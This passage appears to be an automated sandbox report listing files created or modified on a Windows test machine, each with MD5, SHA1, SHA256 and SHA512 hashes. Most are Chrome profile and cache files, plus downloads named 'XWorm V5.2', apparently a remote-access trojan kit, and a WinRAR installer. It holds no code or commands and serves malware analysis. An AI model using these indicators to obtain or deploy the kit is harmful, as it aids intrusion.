MD5 0fa62ca4127d5ae4279c3a4dbcad27f4
SHA1 8c39c9cc68e5a53747857314bf72962358c8b0ff
SHA256 3c4fd01bb8d753207eb01c47fcc08e9e5f2c6db110dd7a03abeceeb841f851ff
SHA512 77a3da819c5f0c145cb8c278c8526fc9e8faeb0765a97b3527e5b0ae725987e08bfaf4b42f15fd0bf34d1244ef65dcdb92479786537d143681d83c98cebd9f20

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe59cdf5.TMP

MD5 1b1d338d7a0bf9bc8c5120901cbc5c82
SHA1 dca366c5fe0f32a54d5e2e69019d8c0426936f18
SHA256 a764ea90819e3c58fcaee86be0e1a31db00370601328412aa39a22412dc4c584
SHA512 874faf8af30c5805c709080766d3a006e137ebfa054ed3dc5151f21dec91a7e54382ee59059699126be959586436faac06a827cbdab4801655019c677feda550

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\fe736964-eb01-4582-8945-a43962d1efd2.tmp

MD5 0dacace565cfa8c76dee2e6fa23648d5
SHA1 4c4f122dd597ef27222d9d7f03c3453c0ff35b95
SHA256 3383edb991b9f947bb4bf911392d8616a5049aadc11fe6deb5195eb80c6158bf
SHA512 bff074a332ca2f7b2bd5c7961652b84b58632e3d7096db0ef41f424ee1573d86372305df519c7739bedd9e5ff1784ef5c2a8bd1ad13ca87ae2c3c3b1048b5f7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 0864207953ddb71d66c4d8faf0f85371
SHA1 35d294ff103e00267f1c9efcab6b064897319f92
SHA256 409ce2e713f6049aa403ab712e9e1a649c8a7f6c4632873a0da5b281f4be8add
SHA512 fc35846132ab78648cd347c217522e5b09b15e8bb2d0b2de8554a69e1651658715749ef4b6890800b90e059b902f4c637b6fd87fe31647e4f02015864c575736

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f3f1caed08dccc9f3586caa0c668fc2e
SHA1 47cfb9036254795638281871d54bbc877131ab4e
SHA256 1650c3c291b3533226b9dd18561b9cbc5289e7d954ab329e48e253d85129f1ca
SHA512 2f6129132ccc39a451b013caac208ea5a36983596e140e2f34d3194bcb2c1cee6aa8932d5e0f8b7ac71fe07da7f99ea80fd67b48686abdfdeef57545198dcd8a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\1b0935aa-8f73-4fac-9a95-3e5cf46042de.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8d89b95c728d1083f69a7a2f830ef911
SHA1 b1b54965c3b60c389da2f1cc991b73236f09f1e5
SHA256 b8fdb1eb4caf8d081e819967e46a0b5bf400b43b969334948f7fc50bff4f2d91
SHA512 8a2fb5ee83172de33d3f0c6195145baac488935323267f1f7c1d3da37e119ee720dd3a822abf28bcb3e867a42817f621b6c97a2971c83e076da1ff653c9081b0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e64057a019902c0580a3a1d43c00d420
SHA1 93772043b6a185bf83bdd5a623061c3b30ae083e
SHA256 714f6efce39d87b74bc219e2cbf4c1d613ef30056647cb01cc82c71ffa359fc2
SHA512 b6bc8567f8960533a521e2938b459d410b6886aac6a9acbc781a2ddb381b494cabfa9ff6159702bfc65583319f494356a37d5819c030fccaf55c99cdc1bae1dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 cae7311947b8e31e8eb0022ae288c97f
SHA1 6ab7f62260482f6ea38b2e43c733037fc9951966
SHA256 ac6689d376d64b4249c700ae4ea3eccf91866135f6fa363c1264896f494c4d1b
SHA512 f22bd3381f062ffbe570420719b81cdf8184f84fe09baf2bc2d96680f9fcd932230d769ea5cc76e38909de05ea385852d9d5f7277e823093a65b227583cd8c35

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 330278a52f4905d709e439d7b4a1fa5f
SHA1 5a2e6ce5665013b4f8007e8804a8d6e1089221d2
SHA256 f3b6cef63aff0d505b707321c994f1d94ed39ac820c5afb2eca9544e06c44e95
SHA512 134ddb92e3f168254002596b5caae609adffe9e08a647e01ee79d1a645676127ccc1b4bd8078f6630bf9bf38bde15e4dd753cd5759d63124f04e60050b88c006

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 0c29970d1931017833d95c6fcbede82a
SHA1 5a78d5837355067232a7d390678875dafcf53787
SHA256 28dda563b6a66be2aadb4312c5db20d2625fe635c8cfeff2c3df3eb2ae512736
SHA512 84e06809a8779afe26dab87c4e26aa69e8278cf85d04b9e53405dea240ef9c7426aa72885f801a15e1fdff2e092721698c3281f113b5605dc747bb68f6b8a9f9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1128_594151059\Icons Monochrome\16.png

MD5 a4fd4f5953721f7f3a5b4bfd58922efe
SHA1 f3abed41d764efbd26bacf84c42bd8098a14c5cb
SHA256 c659d57841bb33d63f7b1334200548f207340d95e8e2ae25aac7a798a08071a3
SHA512 7fcc1ca4d6d97335e76faa65b7cfb381fb722210041bdcd3b31b0f94e15dc226eec4639547af86ae71f311f52a956dc83294c2d23f345e63b5e45e25956b2691

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1128_1116287521\Shortcuts Menu Icons\Monochrome\0\512.png

MD5 12a429f9782bcff446dc1089b68d44ee
SHA1 e41e5a1a4f2950a7f2da8be77ca26a66da7093b9
SHA256 e1d7407b07c40b5436d78db1077a16fbf75d49e32f3cbd01187b5eaaa10f1e37
SHA512 1da99c5278a589972a1d711d694890f4fd4ec4e56f83781ab9dee91ba99530a7f90d969588fa24dce24b094a28bdecbea80328cee862031a8b289f3e4f38ce7a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir1128_1116287521\Shortcuts Menu Icons\Monochrome\1\512.png

MD5 7f57c509f12aaae2c269646db7fde6e8
SHA1 969d8c0e3d9140f843f36ccf2974b112ad7afc07
SHA256 1d5c9f67fe93f9fcc1a1b61ebc35bda8f98f1261e5005ae37af71f42aab1d90f
SHA512 3503a0f4939bed9e1fd5e086b17d6de1063220dffdab2d2373aa9582a2454a9d8f18c1be74442f4e597bdba796d2d69220bd9e6be632a15367225b804187ea18

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 f495ba753c830d138bf23f7c0e1f12b7
SHA1 9a1325e34774e1cec38bf4834c390b9a418c8f80
SHA256 00ff50b9915ad558bc4dac40240bdce45cea97bef9f2b74b6c99deebfbb03b19
SHA512 9cb81501fcfdeff81a7f3d9b6556e880260b4a0e57f4345195501cf4a23535fe24aee0406a82fceb8943cf376c251568e069c7231c56a1eccc6fc7ed01e59d2e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\9707e432-c94c-4b14-817b-54ea8794cf92\index-dir\the-real-index

MD5 bf455ecd0099dae47b146d6609f2f963
SHA1 8ee44bdbc92f8a155b8684a57e6a8e461b328111
SHA256 91820abd721ffd2e387f572a5265c3ae4ce8159f2f1c69ece38c0363bba695ac
SHA512 c1bbc0a64e4afd083b9b7b9c7b235cac372bef78d87fb3baeecbcbea636dbcf4187b57653919f5b4a43b359f62a4a386819087a43ef47e260517b799b0e57a12

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\9707e432-c94c-4b14-817b-54ea8794cf92\index-dir\the-real-index~RFe5ab71c.TMP

MD5 2238a95f4a4742640e41c70e64ea7861
SHA1 26403ef2ad41277a270094373276f1eced3b0421
SHA256 e9a961ccbd00dee7df8d0079ab8cf31ef6c0a59f80c9801921ff84898889d059
SHA512 1a45a9cdc29104e0fc46e8f3f4ed0def4e5564a59eb33df53280a82a76b5b936b509a75d86d193d486fe45f3948b6be727113b7f73169f1ea19d6a94575f280d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 a7e51559606968903a4096cfa855d495
SHA1 ab3a980b731b21fc94c69242bd4d2a00cbd7f2d9
SHA256 ba3c2762934a5442908a6adb7a1d2a84fc8cf86f43ab0134efa5b2c8216d197d
SHA512 effb40b734cb4cda127dc398f64772266c9bdffc00bada7479e9b640c74fae60466a46be3f8e72d003bf1f2b1eb674ccd6115f9a72de62b65a92f59bff7bed12

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 03b05ac1934ead1dd5ad9a924115ffc5
SHA1 ad72ea9c3df6e671f6601d2e304e14ed3380ad7b
SHA256 9bf9afd1f23f23a9929ef0fc433b9a6597eeac867fad87dd0bbcb5db91ed36a5
SHA512 56c383f7a07b33ea3fc03b1d0fb30d6ec25ed4f2aab15bbf30c4f8a7a276bc0f6d8cd5fa3be7c1251d83de810b811f8140309df4c3cf63049884c19418ce915d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 0e96b74a647b2cea54ead5271b023d51
SHA1 d9aef4254fb67d27fcce5af55e6c8e8d3670f6bf
SHA256 0ad1b9760d51875b9d2122c7a025b2cd279cae812fc9875b24c0568421aae65d
SHA512 37ee89d2dcc153712e29681b1c47420c21930b274c7e5f9442e8474c84a28835642c3b2811c42ac7d972fed329058fe71baee866cede21197dce5b51e5706237

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\803e2f9b-3f24-43f6-a817-73d2202232bb\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000045

MD5 38288a369294784a5369e7abf03a04e3
SHA1 b078a4e77e8f92ef8ebd52ad508258314dc46359
SHA256 ab2fca2ed379d5f710c7a741b41aa0657ad41d53f70d2e1741417b22e4ba516b
SHA512 169fc48ad74690dacff887171eb5e5db9b1c51e8bcdb57352803da80643a3ccbab55069060f6628298f134714d107122cee9e66f34c276a7eccab33d3036faca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00003d

MD5 c758a89dcfa620f9bc138930fe891ca9
SHA1 f68be6d49724806db8f0fe1305e6d573d21b47ef
SHA256 c7807a5a766842371b12966dda2640923bfce3e17b06e553c4057dd5ac7364b4
SHA512 1d0f2b06adaeedc53d8519a88d354af6f3918119ce03edc9133eb037a03beaac2f3970dae333b64abe46936a89bc66bec0ec3fe764029982f43698fdca311490

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000043

MD5 4519631388f92d71f67093bacff1dd35
SHA1 021a5a025dde022771995fd6b328af451340e68d
SHA256 f41a9c7401f3227e0d5b9ee08ace82d4522c247b1994a10788c5350c8adf8269
SHA512 dc0279b40524d4e89e5715e3ec44cc8cc86ef8aff8a0dd401df8366203abda1743d65185780bf3f7c7d540006fe73ba31be7a859d66ff1d31b88cf67144e4e4c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000041

MD5 97f199034162b1283dbbbfb994def15a
SHA1 539f1d9814baa54fd3425ec0139f3cfa932301ab
SHA256 3cc79470f85abf02f16c22e1ab349ea126a5d6d1a2da8d302155e0dbc26f0d7e
SHA512 ba709e9f101f44349e356d0d2c126a7eb07b6400d4c2ed5710caa4dbeb5fb33788b162f3b96d6ec2e1957d14229ff17af3be8606740998bc4ab82f153bfadf2b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000044

MD5 f1d46d46890fea3d157d1e7ac140958f
SHA1 b113f52cef561ccf308c5c95fef376f2ff1283bf
SHA256 92c56ad492f5d744f7951ca1502ddd438ddcf56ec3f0a8425ba78abf95bcd164
SHA512 ada00fd8ec502e2aa7cac82b2634de53fb0526e7e3cccfa07715b4c1adfbcdb25ad21b1b3b27c618b8c5ca3e3e0151d529603771eedd12c12471356117673e1d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000042

MD5 f0d81b309d4441d6dc22bdcb9e9e7d01
SHA1 77e7510fd01735991f8eb242a8a20acf5c7326d6
SHA256 90b890766ed0dfc173b119f625e4bde7785d509a76d27354148bf0a80a09889c
SHA512 79d3758017eb11ff478e0c258405aeb66eeef77b6041689708667948c85c1ff27688491eb8fd7efba3e5d392e299c055b3ae54fd212a0f5caaca3d91c425829e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 4d63a3e4fe1b72e0fe6cdf1d13ffec40
SHA1 d227607927edb98feba4d2492e46c8197ddcb137
SHA256 efd7b1115f2f863f76a6da661cfc7848e27249344f42af61ed25248e4fbace24
SHA512 10d57fbdee231bc7fa754fcda173ab099488c6f7f3164964eff16d1d662ec6e4171e1d84c36c3c49bf609c2e57a0d81f42c17984ad1cdc849be08e1870c1bc16

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b21a5144386a6c9b8207940e8eef782b
SHA1 c2ba233787376445658c37d6250636f38c16b149
SHA256 02faa1c897b128eb2985eb94b0177833c11629e554b72bd02862bdc7ee52c9fb
SHA512 b67996e23d87a1465a50b24594227918d60ca500e8816d7d2ad0487172c31f2c859e49b4790cee747f6d6275bf5643d65c519d536e87576d0e229fd411d57429

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 12dad0ca45e789bcd09dd8f346fbc3ee
SHA1 6dd5c9f06b766e4770a060de78bf39cfba0025c1
SHA256 25bae30419c2c454aceb6a9c2a45143b72da66c5af0bbc5b3283f244e8e6bb96
SHA512 183d548303e0e4c5d8ed80e84c8165fe3f0652868f43fb1963ff71a266affd30837a6bb239f3a7a61422bf9ac473fc21ab947d9100fd721a5ac3f9dc2049fd88

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\803e2f9b-3f24-43f6-a817-73d2202232bb\093389ebade69a14_0

MD5 3cc593d41384ebc761769186a90e2bfa
SHA1 2980ab1d836633b7aa7d6fd74e4ace49ab1b0f2c
SHA256 ff6515d035bdc0d3023896697f778e49388a419a98b4f40d10aa9f3529a5c8c3
SHA512 fdef19829e64c31633d50dc35722d0dda2131969358fbd041d39823444a795cabd67b2fc31c9159401592e7d4caac5d360f1d928dadc081885cab273743e24f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 acb04ecaece1aef22346daa429bf0b90
SHA1 64854d32120bfaf8a82408dfd93f0a4da530db7b
SHA256 31bb692f47f3a4626f5e084776d308a9473e5bda25dbb9ca2251db4b5f1a642b
SHA512 8e4850dc06680de0c915691e1206475e9a9232c73650f5c0e6c4a410594f9958ff4d77370b8908dcff71914ded7ac12071e566b6396ca5d7d83a403aa6f7a7de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\803e2f9b-3f24-43f6-a817-73d2202232bb\index-dir\the-real-index

MD5 0e2c563f41500ec6443532f3864c8da1
SHA1 8b199d3e92c706c2bd6eee84aca06456ad8b7f54
SHA256 ed20200b0d5b47b3306fa3f313cdd8339c1ced0e1fe5666c99896bd5e5eb52f4
SHA512 80518e448f467912a340b26e12a9a109bc252a001ef3b7e6b844cde946ef4b076a209dbb458ae93a7c94cc731d31c115b601c8d6b982af99963a7a3f8b0b32e7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\803e2f9b-3f24-43f6-a817-73d2202232bb\index-dir\the-real-index~RFe5b1356.TMP

MD5 00d14e36bc5c0f5a894de57cacd24010
SHA1 3be6c17203293184ca475b45aea787da898795d3
SHA256 26f64d6ff2c0031c6bf032487264182eca921671b5e21cdddc89c067f9ca41f3
SHA512 de31bfdde8477a1917c964f8081f7a9d9ced84ecdabfeee05c41e5a6a9f7f45c78cc9501313aef156dd1fddcab2d0ddc77eaccf248c884d80a0583075fc3605f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\p\Paths\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 30daf3e3bab537f5cfc67bb1b173cc5c
SHA1 38add45ffdf07350024b8994a1d6e80d9448aeb7
SHA256 a30b7cbf0f12c83b9b2df18a22bd4b0810933c1837a202cb717d9ec38f6b82f1
SHA512 e38b8ab6bfe4a0666bdf5e0a13878f1d28a228bc9f2278736c4f03a2d656e1703e2e126cf67ec24b4b2b612e38fe05c048e2564a0b7d0e7bf7b5b7d54611d7ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3c5fc7a5bb031a028685810dfe3f6017
SHA1 3cc3ff2ab6c628f1711d7ec635bda52c265ed74f
SHA256 34d022600edc479abd14503028e0d2abd55144bcc8f4a2cf754b9a06357a48da
SHA512 903cfeb9d24ebbd317e13c2e0d963b8f8c70149ceb5a743edd8d9f37c0ff1557af146378e7d6f4b02c0e3a65985b33190a10c56440c27a2850fc316a0135e06e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 03a3aed44d9611a96e2ff3224a198f69
SHA1 07bf625c50c96d538e3833f4750d9afbe0394fa7
SHA256 4446ed1a89987a87de90bc4dbf399ec827d6dde4468f91b3cf70ebf1f212419c
SHA512 668f7b0009195e65560560e944889d1ef2299d006dc688677acd5e2647746b3c3e1b99aea70ed6f3d36d8e64bf365202d7167e7660734b9f92c035e029c3194c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f6b147dfaa10c7d0809c066745489236
SHA1 037b2487e11029a928feff996979b49ae32b2cfc
SHA256 a22cd14f73fd0f46e2930ac38fe2bc2c2e38eeafb5a1069e11be075f10c82e1e
SHA512 c9666f1b21767760d3bf791eb89db019066cc1286bb5f5557006c7c98ddef2f6ff255ff41ac080b026c856b6d649710e7a77b228cf3c794daa30cc5e1702f7fe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\9707e432-c94c-4b14-817b-54ea8794cf92\index-dir\the-real-index

MD5 80233565ec1de929ce603b4481a773ef
SHA1 f8becdbcb3f59c6ba04401c91c660ffe3e67b6bb
SHA256 5b75da93b26e978bd7ccbe029337e74f1b8973a4efc849683d9610bb14135366
SHA512 506c1e15b44f0c982f6a7b1f48bba3007020d9c5a6afaeebe070926634cb0a96f5dd456890eae692b6540d9358efd06ed29f6ff0e6ea82fd3ee2abd76f8cbbaf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 5122261158d8c3d96c5e9a9093f9a4f1
SHA1 f11b03e36af3983a9344925714e9d003bdf025be
SHA256 d30812d521a53e0b477a77694eda26b8dd951991d83e049d7c1e1b75e1de8dbb
SHA512 72822c2ecbf23cc9605b3d77103b83e06b6a8d35739bb1d502451addffa8bf09782ce12dd05ee72515ec62068e6a9624eb2185a6eafaffcedc1788b862ed31cc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c7c77f81efe4e405c8a0fe38c007e1ba
SHA1 d54aede3f83b4cfb2aba8b2770d9a2fe59b9fad5
SHA256 27863bbefc7dc3a2d5757c026ab9ed0fa098903512ae921a02149878f52d56d4
SHA512 df71666f22f8f3121a4d6ee0b79625f353ab24224930feb2f173566723e9c254de91e99a25dd482195434ab0ac692820c5ad8fee6e3621a85cbfa888773482cd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 07235fb51840e56cd84176de23bf6753
SHA1 32d7d843258cb9153c1053f39a21bd95b7d7bb6e
SHA256 5afb0b9e0b7bf8785d376ead942a625730e463e333b0f1a8a391db48d8af1d31
SHA512 ebd7e089820566ddbcb2b182743d820da95e38928fdc47c13aa1001f8ecf4094f11c7585988d485e6c28ad651102441e99dad95b057ac6c66554680412ae7655

C:\Users\Admin\Downloads\XWorm V5.2.rar

MD5 822a54a27b8e830128528d6124184c73
SHA1 108ce231d97138c464b1497bbfce706ceb1b3c85
SHA256 39f0a3e0af735252d75be3593aae8ae3912bfec40886c866af8e899430924599
SHA512 73d58a7168330c13fe520404d62d1e1adc6f7aa67b1bcdeb4c7f8faf7d66ce9ea9817ec6e2213858d9742a8f559c1d28369992d1abbf0156ea7e3eb541c5a39f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 d4adc3d04ecc28e78867862e0c1da5a7
SHA1 6b9757f7ed2ad2e44d7a4b520980aa58b04cc64e
SHA256 1aed3b1d1602dc937380e77b158cc5f953e4cc00c5ab641eb29bb40eac2d6527
SHA512 3cb8daa4b11711b3880fa61386d8be278d31d12cfa1fa4ad98ede67703d3d6a14b36af778b215e2b78d09c8685a46f7109f781ccfbe712e9154dc6a768957863

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f4a4c3f4aec647341cec317784953dda
SHA1 69061bdec47d4afb0a7e233b4d3dd4230822c785
SHA256 3eb25fff2319ab13d812c5fd18986162958d41231a108b21fc9b9419314bf12f
SHA512 a863f869ab693b8a5ca2edc28f5deb0382b5f36d03475247110ce26dd46ea1ccedfe23d1a2fca3dfc23cc7a683c9da35367bf5feb0bb3bc324da3c7bced5e5b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 63b39619e0aa4451fe01400a685ae245
SHA1 4d48cd8937f3cc80b8213ebe07c3aed364488da8
SHA256 66045ebccd5cc29ea4a0d5c7b449e727ad53f7fe210679ae3838138fd935ec5a
SHA512 673c13f4c7f1d67a853fdaa449d587e3446b1c2e13645b05263f8699ebcff82c330e120712cc0ba384d2acf30733f4b2ff29d5e6991b1d438fa7f676407d3b02

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 fc74f3508bf3571d6f3477776719a50d
SHA1 b34e84ec1c8a22e993cc065ae0b0fb54489c89ac
SHA256 447c946875fb64d602e57defe07c1006c25e19e895948eb03b2f1419c49a6803
SHA512 de1019fd216b9b51296cc6cac21e8f17fd4508f07d35ca27d9458d04855ab8c49ed848928d6b363b1e593fa01a52148ef7ed5f20bcc86dc34ca07917edcf4122

C:\Users\Admin\Downloads\XWorm V5.2.zip.crdownload

MD5 b6dbce336c5fb82e53d62464a58a4172
SHA1 fb3e0b0437fd2ae60f71f0401788b037d407aa7d
SHA256 d9535d244157ab2d229fe0256c56dc801fc81168ceb74190449cce1f80a5b1a7
SHA512 04d144a94a6c82183b3ba57b4a4573dae0d7f15b1fdda1812c252f153e2da513abc1ae402d7895c0021b004704d8dddaa33289ff916d4c5f9e6ea6a4048dc7ae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8acfc9556195399e978bd305ccc2321b
SHA1 895853c9d7b604fd570213b5798df90dc4763cc6
SHA256 f4bb0a0d690c03de230d280e22d58b19b005fdeaef76ad093312ef27a80d4a57
SHA512 cca591c6715820f70a5870bf777306181f6370a23d74846506088cc064e011abddcac73e3951f054610bd0c0c8e5a6dd39cf8455a2afba84447f84b268bed7e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1bda4ac1a45c7501ce4c3b7c6dc60cbb
SHA1 226dee2df1d33c95a7d34b79971b5c4a41a70a18
SHA256 ee4076d180376a22a80479ca2dc013448d6ddfc859e41dc72faddbaf735c1a05
SHA512 d18752c761b3b2c1a96f1a50f1f013a650245f18ea3a40f080f72d5c254ea730722e2574cff9b146a1de1307b5f0115b366797557394c66f2dff46b6f8199dc9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 f72ff363e4d83ec12ab3076cadab5fa6
SHA1 b2b2e63c2b1b60110acbf597e4bc185b76508128
SHA256 97a225f49f3f7fe64393844dd0b0915a0547b96507c5492cd967e2d17ca2b07b
SHA512 d06e76e1b5e0e4dce484f01ebda305308f4930a006b9f3cce0174f94de4b3d5a304e74d53a25c6aba0b57dd89e2f5cf91968d9f662094c57d9c01630c411bba4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 5681659ff19350cb38054172190c1f73
SHA1 72dfc1cd379e8902a9bb9d1e82635aa6fbab659c
SHA256 9e734bb584b255e80ce888ec4e82b5c8fb5f4d5f21c6b8c8f32515f292e3f686
SHA512 b6f215b20ec1a47f6fb77f33c94ba8102b1d026fef9c316a2f81d09ab06cc2169e78588bd843884018254077c32782702957869a79bfc971302ec095cd3d4f25

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c71ff3a555c8ba913b8241d667010ed8
SHA1 9ef3a3506ab69dd0c2b3bf675fbcf046ce345dd7
SHA256 5fb1d68d130014708779916b3d55c289683537e47fb1df4a51f3155c3a2046a6
SHA512 491842fbf838517e2586e8ec487f136d90136d88301e7e4d263dfe895a5add64670fba9467d260763b35719f09427624d1ea725121302b655dd20ef008e24bce

C:\Users\Admin\Downloads\winrar-x64-701 (1).exe

MD5 3a2f16a044d8f6d2f9443dff6bd1c7d4
SHA1 48c6c0450af803b72a0caa7d5e3863c3f0240ef1
SHA256 31f7ba37180f820313b2d32e76252344598409cb932109dd84a071cd58b64aa6
SHA512 61daee2ce82c3b8e79f7598a79d72e337220ced7607e3ed878a3059ac03257542147dbd377e902cc95f04324e2fb7c5e07d1410f0a1815d5a05c5320e5715ef6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6e4015c973305408baff090837276a47
SHA1 69cd1a5f2bd1d8b8f6ae68c755d757b0b2895200
SHA256 50e452a739aa40df878115e617637caceb3edc6f9b724c34367476bb7de19693
SHA512 224bd6db90b79530c93aa0fa32098b57bd08f1702f6326917f5a1f760512518a0c69eb8d56eece2fe0fd569c2a4d8dd1a9574e8d721b52f586756661973e1cdb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 5c9845bfa1d76a9f610ae3587a486515
SHA1 a515bbe5992958ffa740ba8e71c8e18346f769a0
SHA256 bd178dedab1eb72eefe3697e7302c713d1a9c3c92bb46a684569bb122d1c48f7
SHA512 62d8ba7ec0fa6df1a4c7dab757183d1f809cf1e53bcfb94c567079eadafca3019d6ff00b7177372b4576e2c8e2ba3bf862bf4d24802e75295303cf1c86a60ee6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 4f9ec504d2f0855635ab89ca206af51e
SHA1 6bce6d261d8a67571f26d5077cee4e2e00ef9d27
